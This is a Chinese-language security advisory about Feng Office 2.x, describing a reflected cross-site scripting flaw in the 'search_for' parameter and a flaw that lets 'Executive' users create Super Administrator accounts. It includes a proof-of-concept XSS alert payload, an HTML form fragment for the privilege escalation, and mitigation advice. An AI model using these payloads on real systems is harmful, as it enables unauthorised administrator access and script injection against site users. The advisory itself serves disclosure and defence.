Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Feng Office跨站脚本执行和越权操作漏洞

发布日期:2012-11-22
更新日期:2012-11-25受影响系统:
Feng Office Feng Office 2.x
描述:
--------------------------------------------------------------------------------
Feng Office是一个开源的在线协作系统,采用BS架构,运用php语言开发而成。Feng Office 2.2.1及其他版本存在越权操作和跨站漏洞,恶意用户可利用这些漏洞绕过某些安全限制和执行脚本代码。1)传递到index.php (当参数"a"和"c"的值是"search"时) 内"search_for"参数的输入没有正确过滤即返回给用户,导致用户在浏览站点时恶意HTML和脚本代码被执行。2)在创建用户时,应用没有正确检查权限,导致有"Executive" 权限的用户可以越权创建用户。<*来源:Ur0b0r0x
 
  链接:http://secunia.com/advisories/51356/
        http://packetstormsecurity.org/files/118273/Feng-Office-2.0-Beta-3-XSS-Privilege-Escalation.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Proof of Concept Video
http://www.youtube.com/watch?v=Q_B_5VkAVhU# Expl0it/P0c/Xss ###################
<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT># Expl0it/P0c/Privilege Escalation ###################
<input type="hidden" value="" name="contact[new_contact_from_mail_div_id]">
<input type="hidden" value="" name="contact[hf_contacts]">
<label for="og_1353469580_283914profileFormFirstName">First name:     
<input type="text" value="poc" name="contact[first_name]" maxlength="50" id="og_1353469580_283914profileFormFirstName">
<label for="og_1353469580_283914profileFormSurName">Last name:     
<input type="text" value="poc2" name="contact[surname]" maxlength="50" id="og_1353469580_283914profileFormSurname">   
<label for="og_1353469580_283914profileFormEmail">Email address:</label>     
<input type="text" value="poctest@live.com" name="contact[email]" style="width:260px;" maxlength="100" id="og_1353469580_283914profileFormEmail">
<div style="" class="user-data">
<label>Password:<input type="password" name="contact[user][password]">
<label>Repeat password:<input type="password" name="contact[user][password_a]" class="field-error">
<select name="contact[user][type]">
<option value="1">Super Administrator</option>
<button tabindex="20000" id="og_1353471270_613002submit2" class="submit" type="submit" accesskey="s">Add Per<u>s</u>on</button>建议:
--------------------------------------------------------------------------------
临时解决方法:如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:* 将search_for参数值在返回给用户前进行html编码。厂商补丁:Feng Office
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:www.fengoffice.com/GIMP XWD文件处理缓冲区溢出漏洞WordPress Madebymilk Theme "id"参数SQL注入漏洞相关资讯      跨站脚本执行漏洞  Feng Office 
  • HP Network Node Manager i多个不  (02/05/2013 09:14:03)
  • JBoss Enterprise Portal Platform  (01/26/2013 08:05:16)
  • Advantech WebAccess HMI/SCADA不  (01/11/2013 08:47:20)
  • Google Web Toolkit 跨站脚本执行  (01/26/2013 08:08:23)
  • Apache CouchDB 跨站脚本执行漏洞  (01/19/2013 09:24:15)
  • Dotproject多个SQL注入和跨站脚本  (11/23/2012 10:50:34)
本文评论 查看全部评论 (0)<
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款